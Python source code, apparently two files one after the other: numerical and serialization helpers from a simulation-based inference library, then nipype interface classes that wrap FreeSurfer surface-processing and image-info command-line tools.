A single point in 1d vector
h : float or list
Stepsize or stepsizes for the dimensions
replace_neg_inf : bool
Replace neg inf fn values with gradient 0 (useful for logpdf gradients)
Returns
-------
grad : np.ndarray
1D gradient vector
"""
h = 0.00001 if h is None else h
h = np.asanyarray(h).reshape(-1)
x = np.asanyarray(x, dtype=float).reshape(-1)
dim = len(x)
X = np.zeros((dim * 3, dim))
for i in range(3):
Xi = np.tile(x, (dim, 1))
np.fill_diagonal(Xi, Xi.diagonal() + (i - 1) * h)
X[i * dim:(i + 1) * dim, :] = Xi
f = fn(X)
f = f.reshape((3, dim))
if replace_neg_inf:
if np.any(np.isneginf(f)):
return np.zeros(dim)
grad = np.gradient(f, *h, axis=0)
return grad[1, :]
def sample_object_to_dict(data, elem, skip=''):
"""Process data from self object to data dictionary to prepare for json serialization.
Parameters
----------
data : dict, required
Stores collected data for json
elem : dict, required
Default data from Sample object(s)
skip : str, optional
Some keys in the object should be skipped, such as `outputs` or `populations`. Latter
is skipped in case if it is already processed previously.
"""
for key, val in elem.__dict__.items():
# skip `outputs` because its values are in `samples` and in `discrepancies`
if key in ['outputs', skip]:
continue
if key == 'meta':
for meta_key, meta_val in elem.__dict__[key].items():
data[meta_key] = meta_val
continue
data[key] = val
def numpy_to_python_type(data):
"""Convert numpy data types to python data type for json serialization.
Parameters
----------
data : dict, required
Stores collected data for json
"""
for key, val in data.items():
# in data there is keys as 'samples' which is actually a dictionary
if isinstance(val, dict):
for nested_key, nested_val in val.items():
is_numpy = type(nested_val)
data_type = str(is_numpy)
# check whether the current value has numpy data type
if is_numpy.__module__ == np.__name__:
# it is enough to check that current value's name has one of these sub-strings
# https://docs.scipy.org/doc/numpy-1.13.0/user/basics.types.html
if 'array' in data_type:
data[key][nested_key] = nested_val.tolist()
elif 'int' in data_type:
data[key][nested_key] = int(nested_val)
elif 'float' in data_type:
data[key][nested_key] = float(nested_val)
is_numpy = type(val)
data_type = str(is_numpy)
if is_numpy.__module__ == np.__name__:
if 'array' in data_type:
data[key] = val.tolist()
elif 'int' in data_type:
data[key] = int(val)
elif 'float' in data_type:
data[key] = float(val)
def weighted_sample_quantile(x, alpha, weights=None):
"""Calculate alpha-quantile of a weighted sample.
Parameters
----------
x : array
One-dimensional sample
alpha : float
Probability threshold for alpha-quantile
weights : array, optional
Sample weights (possibly unnormalized), equal weights by default
Returns
-------
alpha_q : array
alpha-quantile
"""
index = np.argsort(x)
if alpha == 0:
alpha_q = x[index[0]]
else:
if weights is None:
weights = np.ones(len(index))
weights = weights / np.sum(weights)
sorted_weights = weights[index]
cum_weights = np.insert(np.cumsum(sorted_weights), 0, 0)
cum_weights[-1] = 1.0
index_alpha = np.where(np.logical_and(cum_weights[:-1] < alpha,
alpha <= cum_weights[1:]))[0][0]
alpha_q = x[index][index_alpha]
return alpha_q
def flat_array_to_dict(names, arr):
"""Map flat array to a dictionary with parameter names.
Parameters
----------
names: List[string]
parameter names
arr: np.array, shape: (D,)
flat theta array
Returns
-------
Dict
dictionary with named parameters
"""
# res = model.generate(batch_size=1)
# param_dict = {}
# cur_ind = 0
# for param_name in model.parameter_names:
# tensor = res[param_name]
# assert isinstance(tensor, np.ndarray)
# if tensor.ndim == 2:
# dim = tensor.shape[1]
# val = arr[cur_ind:cur_ind + dim]
# cur_ind += dim
# assert isinstance(val, np.ndarray)
# assert val.ndim == 1
# param_dict[param_name] = np.expand_dims(val, 0)
#
# else:
# dim = 1
# val = arr[cur_ind:cur_ind + dim]
# cur_ind += dim
# assert isinstance(val, np.ndarray)
# assert val.ndim == 1
# param_dict[param_name] = val
# TODO: This approach covers only the case where all parameters
# TODO: are univariate variables (i.e. independent between them)
param_dict = {}
for ii, param_name in enumerate(names):
param_dict[param_name] = np.expand_dims(arr[ii:ii + 1], 0)
return param_dict
def resolve_sigmas(parameter_names: List[str],
sigma_proposals: Optional[Dict] = None,
bounds: Optional[Dict] = None) -> List:
"""Map dictionary of sigma_proposals into a list order as parameter_names.
Parameters
----------
parameter_names: List[str]
names of the parameters
sigma_proposals: Dict
non-negative standard deviations for each dimension
{'parameter_name': float}
bounds : Dict, optional
the region where to estimate the posterior for each parameter in
model.parameters
`{'parameter_name':(lower, upper), ... }
Returns
-------
List
list of sigma_proposals in the same order than in parameter_names
"""
if sigma_proposals is None:
sigma_proposals = []
for bound in bounds:
length_interval = bound[1] - bound[0]
sigma_proposals.append(length_interval / 10)
elif isinstance(sigma_proposals, dict):
errmsg = "sigma_proposals' keys have to be identical to " \
"target_model.parameter_names."
if len(sigma_proposals) is not len(parameter_names):
raise ValueError(errmsg)
try:
sigma_proposals = [sigma_proposals[x] for x in parameter_names]
except ValueError:
print(parameter_names)
else:
raise ValueError("If provided, sigma_proposals need to be input as a dict.")
return sigma_proposals
|
|
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
"""Interfaces to assorted Freesurfer utility programs.
Change directory to provide relative paths for doctests
>>> import os
>>> filepath = os.path.dirname( os.path.realpath( __file__ ) )
>>> datadir = os.path.realpath(os.path.join(filepath, '../../testing/data'))
>>> os.chdir(datadir)
"""
__docformat__ = 'restructuredtext'
import os
import re
from nipype.utils.filemanip import fname_presuffix, split_filename
from nipype.interfaces.freesurfer.base import FSCommand, FSTraitedSpec
from nipype.interfaces.base import TraitedSpec, File, traits, OutputMultiPath, isdefined, CommandLine, CommandLineInputSpec
filemap = dict(cor='cor', mgh='mgh', mgz='mgz', minc='mnc',
afni='brik', brik='brik', bshort='bshort',
spm='img', analyze='img', analyze4d='img',
bfloat='bfloat', nifti1='img', nii='nii',
niigz='nii.gz')
filetypes = ['cor', 'mgh', 'mgz', 'minc', 'analyze',
'analyze4d', 'spm', 'afni', 'brik', 'bshort',
'bfloat', 'sdt', 'outline', 'otl', 'gdf',
'nifti1', 'nii', 'niigz']
class SampleToSurfaceInputSpec(FSTraitedSpec):
source_file = File(exists=True, mandatory=True, argstr="--mov %s",
desc="volume to sample values from")
reference_file = File(exists=True, argstr="--ref %s",
desc="reference volume (default is orig.mgz)")
hemi = traits.Enum("lh", "rh", mandatory=True, argstr="--hemi %s",
desc="target hemisphere")
surface = traits.String(argstr="--surf %s", desc="target surface (default is white)")
reg_xors = ["reg_file", "reg_header", "mni152reg"]
reg_file = File(exists=True, argstr="--reg %s", mandatory=True, xor=reg_xors,
desc="source-to-reference registration file")
reg_header = traits.Bool(argstr="--regheader %s", requires=["subject_id"],
mandatory=True, xor=reg_xors,
desc="register based on header geometry")
mni152reg = traits.Bool(argstr="--mni152reg",
mandatory=True, xor=reg_xors,
desc="source volume is in MNI152 space")
apply_rot = traits.Tuple(traits.Float, traits.Float, traits.Float,
argstr="--rot %.3f %.3f %.3f",
desc="rotation angles (in degrees) to apply to reg matrix")
apply_trans = traits.Tuple(traits.Float, traits.Float, traits.Float,
argstr="--trans %.3f %.3f %.3f",
desc="translation (in mm) to apply to reg matrix")
override_reg_subj = traits.Bool(argstr="--srcsubject %s", requires=["subject_id"],
desc="override the subject in the reg file header")
sampling_method = traits.Enum("point", "max", "average",
mandatory=True, argstr="%s", xor=["projection_stem"],
requires=["sampling_range", "sampling_units"],
desc="how to sample -- at a point or at the max or average over a range")
sampling_range = traits.Either(traits.Float,
traits.Tuple(traits.Float, traits.Float, traits.Float),
desc="sampling range - a point or a tuple of (min, max, step)")
sampling_units = traits.Enum("mm", "frac", desc="sampling range type -- either 'mm' or 'frac'")
projection_stem = traits.String(mandatory=True, xor=["sampling_method"],
desc="stem for precomputed linear estimates and volume fractions")
smooth_vol = traits.Float(argstr="--fwhm %.3f", desc="smooth input volume (mm fwhm)")
smooth_surf = traits.Float(argstr="--surf-fwhm %.3f", desc="smooth output surface (mm fwhm)")
interp_method = traits.Enum("nearest", "trilinear", argstr="--interp %s",
desc="interpolation method")
cortex_mask = traits.Bool(argstr="--cortex", xor=["mask_label"],
desc="mask the target surface with hemi.cortex.label")
mask_label = File(exists=True, argstr="--mask %s", xor=["cortex_mask"],
desc="label file to mask output with")
float2int_method = traits.Enum("round", "tkregister", argstr="--float2int %s",
desc="method to convert reg matrix values (default is round)")
fix_tk_reg = traits.Bool(argstr="--fixtkreg", desc="make reg matrix round-compatible")
subject_id = traits.String(desc="subject id")
target_subject = traits.String(argstr="--trgsubject %s",
desc="sample to surface of different subject than source")
surf_reg = traits.Bool(argstr="--surfreg", requires=["target_subject"],
desc="use surface registration to target subject")
ico_order = traits.Int(argstr="--icoorder %d", requires=["target_subject"],
desc="icosahedron order when target_subject is 'ico'")
reshape = traits.Bool(argstr="--reshape", xor=["no_reshape"],
desc="reshape surface vector to fit in non-mgh format")
no_reshape = traits.Bool(argstr="--noreshape", xor=["reshape"],
desc="do not reshape surface vector (default)")
reshape_slices = traits.Int(argstr="--rf %d", desc="number of 'slices' for reshaping")
scale_input = traits.Float(argstr="--scale %.3f",
desc="multiple all intensities by scale factor")
frame = traits.Int(argstr="--frame %d", desc="save only one frame (0-based)")
out_file = File(argstr="--o %s", genfile=True, desc="surface file to write")
out_type = traits.Enum(filetypes, argstr="--out_type %s", desc="output file type")
hits_file = traits.Either(traits.Bool, File(exists=True), argstr="--srchit %s",
desc="save image with number of hits at each voxel")
hits_type = traits.Enum(filetypes, argstr="--srchit_type", desc="hits file type")
vox_file = traits.Either(traits.Bool, File, argstr="--nvox %s",
desc="text file with the number of voxels intersecting the surface")
class SampleToSurfaceOutputSpec(TraitedSpec):
out_file = File(exists=True, desc="surface file")
hits_file = File(exists=True, desc="image with number of hits at each voxel")
vox_file = File(exists=True,
desc="text file with the number of voxels intersecting the surface")
class SampleToSurface(FSCommand):
"""Sample a volume to the cortical surface using Freesurfer's mri_vol2surf.
You must supply a sampling method, range, and units. You can project
either a given distance (in mm) or a given fraction of the cortical
thickness at that vertex along the surface normal from the target surface,
and then set the value of that vertex to be either the value at that point
or the average or maximum value found along the projection vector.
By default, the surface will be saved as a vector with a length equal to the
number of vertices on the target surface. This is not a problem for Freesurfer
programs, but if you intend to use the file with interfaces to another package,
you must set the ``reshape`` input to True, which will factor the surface vector
into a matrix with dimensions compatible with proper Nifti files.
Examples
--------
>>> import nipype.interfaces.freesurfer as fs
>>> sampler = fs.SampleToSurface(hemi="lh")
>>> sampler.inputs.source_file = "cope1.nii.gz"
>>> sampler.inputs.reg_file = "register.dat"
>>> sampler.inputs.sampling_method = "average"
>>> sampler.inputs.sampling_range = 1
>>> sampler.inputs.sampling_units = "frac"
>>> res = sampler.run() # doctest: +SKIP
"""
_cmd = "mri_vol2surf"
input_spec = SampleToSurfaceInputSpec
output_spec = SampleToSurfaceOutputSpec
filemap = dict(cor='cor', mgh='mgh', mgz='mgz', minc='mnc',
afni='brik', brik='brik', bshort='bshort',
spm='img', analyze='img', analyze4d='img',
bfloat='bfloat', nifti1='img', nii='nii',
niigz='nii.gz')
def _format_arg(self, name, spec, value):
if name == "sampling_method":
range = self.inputs.sampling_range
units = self.inputs.sampling_units
if units == "mm":
units = "dist"
if isinstance(range, tuple):
range = "%.3f %.3f %.3f" % range
else:
range = "%.3f" % range
method = dict(point="", max="-max", average="-avg")[value]
return "--proj%s%s %s" % (units, method, range)
if name == "reg_header":
return spec.argstr % self.inputs.subject_id
if name == "override_reg_subj":
return spec.argstr % self.inputs.subject_id
if name in ["hits_file", "vox_file"]:
return spec.argstr % self._get_outfilename(name)
return super(SampleToSurface, self)._format_arg(name, spec, value)
def _get_outfilename(self, opt="out_file"):
outfile = getattr(self.inputs, opt)
if not isdefined(outfile) or isinstance(outfile, bool):
if isdefined(self.inputs.out_type):
if opt == "hits_file":
suffix = '_hits.' + self.filemap[self.inputs.out_type]
else:
suffix = '.' + self.filemap[self.inputs.out_type]
elif opt == "hits_file":
suffix = "_hits.mgz"
else:
suffix = '.mgz'
outfile = fname_presuffix(self.inputs.source_file,
newpath=os.getcwd(),
prefix=self.inputs.hemi + ".",
suffix=suffix,
use_ext=False)
return outfile
def _list_outputs(self):
outputs = self._outputs().get()
outputs["out_file"] = os.path.abspath(self._get_outfilename())
hitsfile = self.inputs.hits_file
if isdefined(hitsfile):
outputs["hits_file"] = hitsfile
if isinstance(hitsfile, bool):
hitsfile = self._get_outfilename("hits_file")
voxfile = self.inputs.vox_file
if isdefined(voxfile):
if isinstance(voxfile, bool):
voxfile = fname_presuffix(self.inputs.source_file,
newpath=os.getcwd(),
prefix=self.inputs.hemi + ".",
suffix="_vox.txt",
use_ext=False)
outputs["vox_file"] = voxfile
return outputs
def _gen_filename(self, name):
if name == "out_file":
return self._list_outputs()[name]
return None
class SurfaceSmoothInputSpec(FSTraitedSpec):
in_file = File(mandatory=True, argstr="--sval %s", desc="source surface file")
subject_id = traits.String(mandatory=True, argstr="--s %s", desc="subject id of surface file")
hemi = traits.Enum("lh", "rh", argstr="--hemi %s", mandatory=True, desc="hemisphere to operate on")
fwhm = traits.Float(argstr="--fwhm %.4f", xor=["smooth_iters"],
desc="effective FWHM of the smoothing process")
smooth_iters = traits.Int(argstr="--smooth %d", xor=["fwhm"],
desc="iterations of the smoothing process")
cortex = traits.Bool(True, argstr="--cortex", usedefault=True, desc="only smooth within $hemi.cortex.label")
reshape = traits.Bool(argstr="--reshape",
desc="reshape surface vector to fit in non-mgh format")
out_file = File(argstr="--tval %s", genfile=True, desc="surface file to write")
class SurfaceSmoothOutputSpec(TraitedSpec):
out_file = File(exists=True, desc="smoothed surface file")
class SurfaceSmooth(FSCommand):
"""Smooth a surface image with mri_surf2surf.
The surface is smoothed by an interative process of averaging the
value at each vertex with those of its adjacent neighbors. You may supply
either the number of iterations to run or a desired effective FWHM of the
smoothing process. If the latter, the underlying program will calculate
the correct number of iterations internally.
.. seealso::
SmoothTessellation() Interface
For smoothing a tessellated surface (e.g. in gifti or .stl)
Examples
--------
>>> import nipype.interfaces.freesurfer as fs
>>> smoother = fs.SurfaceSmooth()
>>> smoother.inputs.in_file = "lh.cope1.mgz"
>>> smoother.inputs.subject_id = "subj_1"
>>> smoother.inputs.hemi = "lh"
>>> smoother.inputs.fwhm = 5
>>> smoother.run() # doctest: +SKIP
"""
_cmd = "mri_surf2surf"
input_spec = SurfaceSmoothInputSpec
output_spec = SurfaceSmoothOutputSpec
def _list_outputs(self):
outputs = self._outputs().get()
outputs["out_file"] = self.inputs.out_file
if not isdefined(outputs["out_file"]):
in_file = self.inputs.in_file
if isdefined(self.inputs.fwhm):
kernel = self.inputs.fwhm
else:
kernel = self.inputs.smooth_iters
outputs["out_file"] = fname_presuffix(in_file,
suffix="_smooth%d" % kernel,
newpath=os.getcwd())
return outputs
def _gen_filename(self, name):
if name == "out_file":
return self._list_outputs()[name]
return None
class SurfaceTransformInputSpec(FSTraitedSpec):
source_file = File(exists=True, mandatory=True, argstr="--sval %s",
xor=['source_annot_file'],
desc="surface file with source values")
source_annot_file = File(exists=True, mandatory=True,
argstr="--sval-annot %s",
xor=['source_file'],
desc="surface annotation file")
source_subject = traits.String(mandatory=True, argstr="--srcsubject %s",
desc="subject id for source surface")
hemi = traits.Enum("lh", "rh", argstr="--hemi %s", mandatory=True,
desc="hemisphere to transform")
target_subject = traits.String(mandatory=True, argstr="--trgsubject %s",
desc="subject id of target surface")
target_ico_order = traits.Enum(1, 2, 3, 4, 5, 6, 7,
argstr="--trgicoorder %d",
desc=("order of the icosahedron if "
"target_subject is 'ico'"))
source_type = traits.Enum(filetypes, argstr='--sfmt %s',
requires=['source_file'],
desc="source file format")
target_type = traits.Enum(filetypes, argstr='--tfmt %s',
desc="output format")
reshape = traits.Bool(argstr="--reshape",
desc="reshape output surface to conform with Nifti")
reshape_factor = traits.Int(argstr="--reshape-factor",
desc="number of slices in reshaped image")
out_file = File(argstr="--tval %s", genfile=True,
desc="surface file to write")
class SurfaceTransformOutputSpec(TraitedSpec):
out_file = File(exists=True, desc="transformed surface file")
class SurfaceTransform(FSCommand):
"""Transform a surface file from one subject to another via a spherical registration.
Both the source and target subject must reside in your Subjects Directory,
and they must have been processed with recon-all, unless you are transforming
to one of the icosahedron meshes.
Examples
--------
>>> from nipype.interfaces.freesurfer import SurfaceTransform
>>> sxfm = SurfaceTransform()
>>> sxfm.inputs.source_file = "lh.cope1.nii.gz"
>>> sxfm.inputs.source_subject = "my_subject"
>>> sxfm.inputs.target_subject = "fsaverage"
>>> sxfm.inputs.hemi = "lh"
>>> sxfm.run() # doctest: +SKIP
"""
_cmd = "mri_surf2surf"
input_spec = SurfaceTransformInputSpec
output_spec = SurfaceTransformOutputSpec
def _list_outputs(self):
outputs = self._outputs().get()
outputs["out_file"] = self.inputs.out_file
if not isdefined(outputs["out_file"]):
source = self.inputs.source_file
# Some recon-all files don't have a proper extension (e.g. "lh.thickness")
# so we have to account for that here
bad_extensions = [".%s" % e for e in ["area", "mid", "pial", "avg_curv", "curv", "inflated",
"jacobian_white", "orig", "nofix", "smoothwm", "crv",
"sphere", "sulc", "thickness", "volume", "white"]]
use_ext = True
if split_filename(source)[2] in bad_extensions:
source = source + ".stripme"
use_ext = False
ext = ""
if isdefined(self.inputs.target_type):
ext = "." + filemap[self.inputs.target_type]
use_ext = False
outputs["out_file"] = fname_presuffix(source,
suffix=".%s%s" % (self.inputs.target_subject, ext),
newpath=os.getcwd(),
use_ext=use_ext)
else:
outputs["out_file"] = os.path.abspath(self.inputs.out_file)
return outputs
def _gen_filename(self, name):
if name == "out_file":
return self._list_outputs()[name]
return None
class Surface2VolTransformInputSpec(FSTraitedSpec):
source_file = File(exists=True, argstr='--surfval %s',
copyfile=False, mandatory=True,
desc='This is the source of the surface values')
hemi = traits.Str(argstr='--hemi %s', mandatory=True,
desc='hemisphere of data')
transformed_file = File(name_template="%s_asVol.nii", desc='Output volume',
argstr='--outvol %s',
name_source=['source_file'], hash_files=False)
reg_file = File(exists=True, argstr='--volreg %s',
mandatory=True,
desc='tkRAS-to-tkRAS matrix (tkregister2 format)',
xor=['subject_id'])
template_file = File(exists=True, argstr='--template %s',
desc='Output template volume')
mkmask = traits.Bool(desc='make a mask instead of loading surface values',
argstr='--mkmask')
vertexvol_file = File(name_template="%s_asVol_vertex.nii",
desc=('Path name of the vertex output volume, which '
'is the same as output volume except that the '
'value of each voxel is the vertex-id that is '
'mapped to that voxel.'),
argstr='--vtxvol %s', name_source=['source_file'],
hash_files=False)
surf_name = traits.Str(argstr='--surf %s',
desc='surfname (default is white)')
projfrac = traits.Float(argstr='--projfrac %s', desc='thickness fraction')
subjects_dir = traits.Str(argstr='--sd %s',
desc=('freesurfer subjects directory defaults to '
'$SUBJECTS_DIR'))
subject_id = traits.Str(argstr='--identity %s',desc='subject id',
xor=['reg_file'])
class Surface2VolTransformOutputSpec(TraitedSpec):
transformed_file = File(exists=True,
desc='Path to output file if used normally')
vertexvol_file = File(desc='vertex map volume path id. Optional')
class Surface2VolTransform(FSCommand):
"""Use FreeSurfer mri_surf2vol to apply a transform.
Examples
--------
>>> from nipype.interfaces.freesurfer import Surface2VolTransform
>>> xfm2vol = Surface2VolTransform()
>>> xfm2vol.inputs.source_file = 'lh.cope1.mgz'
>>> xfm2vol.inputs.reg_file = 'register.mat'
>>> xfm2vol.inputs.hemi = 'lh'
>>> xfm2vol.inputs.template_file = 'cope1.nii.gz'
>>> xfm2vol.inputs.subjects_dir = '.'
>>> xfm2vol.cmdline
'mri_surf2vol --hemi lh --volreg register.mat --surfval lh.cope1.mgz --sd . --template cope1.nii.gz --outvol lh.cope1_asVol.nii --vtxvol lh.cope1_asVol_vertex.nii'
>>> res = xfm2vol.run()# doctest: +SKIP
"""
_cmd = 'mri_surf2vol'
input_spec = Surface2VolTransformInputSpec
output_spec = Surface2VolTransformOutputSpec
class ApplyMaskInputSpec(FSTraitedSpec):
in_file = File(exists=True, mandatory=True, position=-3, argstr="%s",
desc="input image (will be masked)")
mask_file = File(exists=True, mandatory=True, position=-2, argstr="%s",
desc="image defining mask space")
out_file = File(genfile=True, position=-1, argstr="%s",
desc="final image to write")
xfm_file = File(exists=True, argstr="-xform %s",
desc="LTA-format transformation matrix to align mask with input")
invert_xfm = traits.Bool(argstr="-invert", desc="invert transformation")
xfm_source = File(exists=True, argstr="-lta_src %s", desc="image defining transform source space")
xfm_target = File(exists=True, argstr="-lta_dst %s", desc="image defining transform target space")
use_abs = traits.Bool(argstr="-abs", desc="take absolute value of mask before applying")
mask_thresh = traits.Float(argstr="-T %.4f", desc="threshold mask before applying")
class ApplyMaskOutputSpec(TraitedSpec):
out_file = File(exists=True, desc="masked image")
class ApplyMask(FSCommand):
"""Use Freesurfer's mri_mask to apply a mask to an image.
The mask file need not be binarized; it can be thresholded above a given
value before application. It can also optionally be transformed into input
space with an LTA matrix.
"""
_cmd = "mri_mask"
input_spec = ApplyMaskInputSpec
output_spec = ApplyMaskOutputSpec
def _list_outputs(self):
outputs = self._outputs().get()
outputs["out_file"] = self.inputs.out_file
if not isdefined(outputs["out_file"]):
outputs["out_file"] = fname_presuffix(self.inputs.in_file,
suffix="_masked",
newpath=os.getcwd(),
use_ext=True)
else:
outputs["out_file"] = os.path.abspath(outputs["out_file"])
return outputs
def _gen_filename(self, name):
if name == "out_file":
return self._list_outputs()[name]
return None
class SurfaceSnapshotsInputSpec(FSTraitedSpec):
subject_id = traits.String(position=1, argstr="%s", mandatory=True,
desc="subject to visualize")
hemi = traits.Enum("lh", "rh", position=2, argstr="%s", mandatory=True,
desc="hemisphere to visualize")
surface = traits.String(position=3, argstr="%s", mandatory=True,
desc="surface to visualize")
show_curv = traits.Bool(argstr="-curv", desc="show curvature", xor=["show_gray_curv"])
show_gray_curv = traits.Bool(argstr="-gray", desc="show curvature in gray", xor=["show_curv"])
overlay = File(exists=True, argstr="-overlay %s", desc="load an overlay volume/surface",
requires=["overlay_range"])
reg_xors = ["overlay_reg", "identity_reg", "mni152_reg"]
overlay_reg = traits.File(exists=True, argstr="-overlay-reg %s", xor=reg_xors,
desc="registration matrix file to register overlay to surface")
identity_reg = traits.Bool(argstr="-overlay-reg-identity", xor=reg_xors,
desc="use the identity matrix to register the overlay to the surface")
mni152_reg = traits.Bool(argstr="-mni152reg", xor=reg_xors,
desc="use to display a volume in MNI152 space on the average subject")
overlay_range = traits.Either(traits.Float,
traits.Tuple(traits.Float, traits.Float),
traits.Tuple(traits.Float, traits.Float, traits.Float),
desc="overlay range--either min, (min, max) or (min, mid, max)",
argstr="%s")
overlay_range_offset = traits.Float(argstr="-foffset %.3f",
desc="overlay range will be symettric around offset value")
truncate_overlay = traits.Bool(argstr="-truncphaseflag 1",
desc="truncate the overlay display")
reverse_overlay = traits.Bool(argstr="-revphaseflag 1",
desc="reverse the overlay display")
invert_overlay = traits.Bool(argstr="-invphaseflag 1",
desc="invert the overlay display")
demean_overlay = traits.Bool(argstr="-zm", desc="remove mean from overlay")
annot_file = File(exists=True, argstr="-annotation %s", xor=["annot_name"],
desc="path to annotation file to display")
annot_name = traits.String(argstr="-annotation %s", xor=["annot_file"],
desc="name of annotation to display (must be in $subject/label directory")
label_file = File(exists=True, argstr="-label %s", xor=["label_name"],
desc="path to label file to display")
label_name = traits.String(argstr="-label %s", xor=["label_file"],
desc="name of label to display (must be in $subject/label directory")
colortable = File(exists=True, argstr="-colortable %s", desc="load colortable file")
label_under = traits.Bool(argstr="-labels-under", desc="draw label/annotation under overlay")
label_outline = traits.Bool(argstr="-label-outline", desc="draw label/annotation as outline")
patch_file = File(exists=True, argstr="-patch %s", desc="load a patch")
orig_suffix = traits.String(argstr="-orig %s", desc="set the orig surface suffix string")
sphere_suffix = traits.String(argstr="-sphere %s", desc="set the sphere.reg suffix string")
show_color_scale = traits.Bool(argstr="-colscalebarflag 1",
desc="display the color scale bar")
show_color_text = traits.Bool(argstr="-colscaletext 1",
desc="display text in the color scale bar")
six_images = traits.Bool(desc="also take anterior and posterior snapshots")
screenshot_stem = traits.String(desc="stem to use for screenshot file names")
stem_template_args = traits.List(traits.String, requires=["screenshot_stem"],
desc="input names to use as arguments for a string-formated stem template")
tcl_script = File(exists=True, argstr="%s", genfile=True,
desc="override default screenshot script")
class SurfaceSnapshotsOutputSpec(TraitedSpec):
snapshots = OutputMultiPath(File(exists=True),
desc="tiff images of the surface from different perspectives")
class SurfaceSnapshots(FSCommand):
"""Use Tksurfer to save pictures of the cortical surface.
By default, this takes snapshots of the lateral, medial, ventral,
and dorsal surfaces. See the ``six_images`` option to add the
anterior and posterior surfaces.
You may also supply your own tcl script (see the Freesurfer wiki for
information on scripting tksurfer). The screenshot stem is set as the
environment variable "_SNAPSHOT_STEM", which you can use in your
own scripts.
Node that this interface will not run if you do not have graphics
enabled on your system.
Examples
--------
>>> import nipype.interfaces.freesurfer as fs
>>> shots = fs.SurfaceSnapshots(subject_id="fsaverage", hemi="lh", surface="pial")
>>> shots.inputs.overlay = "zstat1.nii.gz"
>>> shots.inputs.overlay_range = (2.3, 6)
>>> shots.inputs.overlay_reg = "register.dat"
>>> res = shots.run() # doctest: +SKIP
"""
_cmd = "tksurfer"
input_spec = SurfaceSnapshotsInputSpec
output_spec = SurfaceSnapshotsOutputSpec
def _format_arg(self, name, spec, value):
if name == "tcl_script":
if not isdefined(value):
return "-tcl snapshots.tcl"
else:
return "-tcl %s" % value
elif name == "overlay_range":
if isinstance(value, float):
return "-fthresh %.3f" % value
else:
if len(value) == 2:
return "-fminmax %.3f %.3f" % value
else:
return "-fminmax %.3f %.3f -fmid %.3f" % (value[0], value[2], value[1])
elif name == "annot_name" and isdefined(value):
# Matching annot by name needs to strip the leading hemi and trailing
# extension strings
if value.endswith(".annot"):
value = value[:-6]
if re.match("%s[\.\-_]" % self.inputs.hemi, value[:3]):
value = value[3:]
return "-annotation %s" % value
return super(SurfaceSnapshots, self)._format_arg(name, spec, value)
def _run_interface(self, runtime):
if not isdefined(self.inputs.screenshot_stem):
stem = "%s_%s_%s" % (
self.inputs.subject_id, self.inputs.hemi, self.inputs.surface)
else:
stem = self.inputs.screenshot_stem
stem_args = self.inputs.stem_template_args
if isdefined(stem_args):
args = tuple([getattr(self.inputs, arg) for arg in stem_args])
stem = stem % args
# Check if the DISPLAY variable is set -- should avoid crashes (might not?)
if not "DISPLAY" in os.environ:
raise RuntimeError("Graphics are not enabled -- cannot run tksurfer")
runtime.environ["_SNAPSHOT_STEM"] = stem
self._write_tcl_script()
runtime = super(SurfaceSnapshots, self)._run_interface(runtime)
# If a display window can't be opened, this will crash on
# aggregate_outputs. Let's try to parse stderr and raise a
# better exception here if that happened.
errors = ["surfer: failed, no suitable display found",
"Fatal Error in tksurfer.bin: could not open display"]
for err in errors:
if err in runtime.stderr:
self.raise_exception(runtime)
# Tksurfer always (or at least always when you run a tcl script)
# exits with a nonzero returncode. We have to force it to 0 here.
runtime.returncode = 0
return runtime
def _write_tcl_script(self):
fid = open("snapshots.tcl", "w")
script = ["save_tiff $env(_SNAPSHOT_STEM)-lat.tif",
"make_lateral_view",
"rotate_brain_y 180",
"redraw",
"save_tiff $env(_SNAPSHOT_STEM)-med.tif",
"make_lateral_view",
"rotate_brain_x 90",
"redraw",
"save_tiff $env(_SNAPSHOT_STEM)-ven.tif",
"make_lateral_view",
"rotate_brain_x -90",
"redraw",
"save_tiff $env(_SNAPSHOT_STEM)-dor.tif"]
if isdefined(self.inputs.six_images) and self.inputs.six_images:
script.extend(["make_lateral_view",
"rotate_brain_y 90",
"redraw",
"save_tiff $env(_SNAPSHOT_STEM)-pos.tif",
"make_lateral_view",
"rotate_brain_y -90",
"redraw",
"save_tiff $env(_SNAPSHOT_STEM)-ant.tif"])
script.append("exit")
fid.write("\n".join(script))
fid.close()
def _list_outputs(self):
outputs = self._outputs().get()
if not isdefined(self.inputs.screenshot_stem):
stem = "%s_%s_%s" % (self.inputs.subject_id, self.inputs.hemi, self.inputs.surface)
else:
stem = self.inputs.screenshot_stem
stem_args = self.inputs.stem_template_args
if isdefined(stem_args):
args = tuple([getattr(self.inputs, arg) for arg in stem_args])
stem = stem % args
snapshots = ["%s-lat.tif", "%s-med.tif", "%s-dor.tif", "%s-ven.tif"]
if self.inputs.six_images:
snapshots.extend(["%s-pos.tif", "%s-ant.tif"])
snapshots = [self._gen_fname(f % stem, suffix="") for f in snapshots]
outputs["snapshots"] = snapshots
return outputs
def _gen_filename(self, name):
if name == "tcl_script":
return "snapshots.tcl"
return None
class ImageInfoInputSpec(FSTraitedSpec):
in_file = File(exists=True, position=1, argstr="%s", desc="image to query")
class ImageInfoOutputSpec(TraitedSpec):
info = traits.Any(desc="output of mri_info")
out_file = File(exists=True, desc="text file with image information")
data_type = traits.String(desc="image data type")
file_format = traits.String(desc="file format")
TE = traits.String(desc="echo time (msec)")
TR = traits.String(desc="repetition time(msec)")
TI = traits.String(desc="inversion time (msec)")
dimensions = traits.Tuple(desc="image dimensions (voxels)")
vox_sizes = traits.Tuple(desc="voxel sizes (mm)")
orientation = traits.String(desc="image orientation")
ph_enc_dir = traits.String(desc="phase encode direction")
class ImageInfo(FSCommand):
_cmd = "mri_info"
input_spec = ImageInfoInputSpec
output_spec = ImageInfoOutputSpec
def info_regexp(self, info, field, delim="\n"):
m = re.search("%s\s*:\s+(.+?)%s" % (field, delim), info)
if m:
return m.group(1)
else:
return None
def aggregate_outputs(self, runtime=None, needed_outputs=None):
outputs = self._outputs()
info = runtime.stdout
outputs.info = info
# Pulse sequence parameters
for field in ["TE", "TR", "TI"]:
fieldval = self.info_regexp(info, field, ", ")
if fieldval.endswith(" msec"):
fieldval = fieldval[:-5]
setattr(outputs, field, fieldval)
# Voxel info
vox = self.info_regexp(info, "voxel sizes")
vox = tuple(vox.split(", "))
outputs.vox_sizes = vox
dim = self.info_regexp(info, "dimensions")
dim = tuple([int(d) for d in dim.split(" x ")])
outputs.dimensions = dim
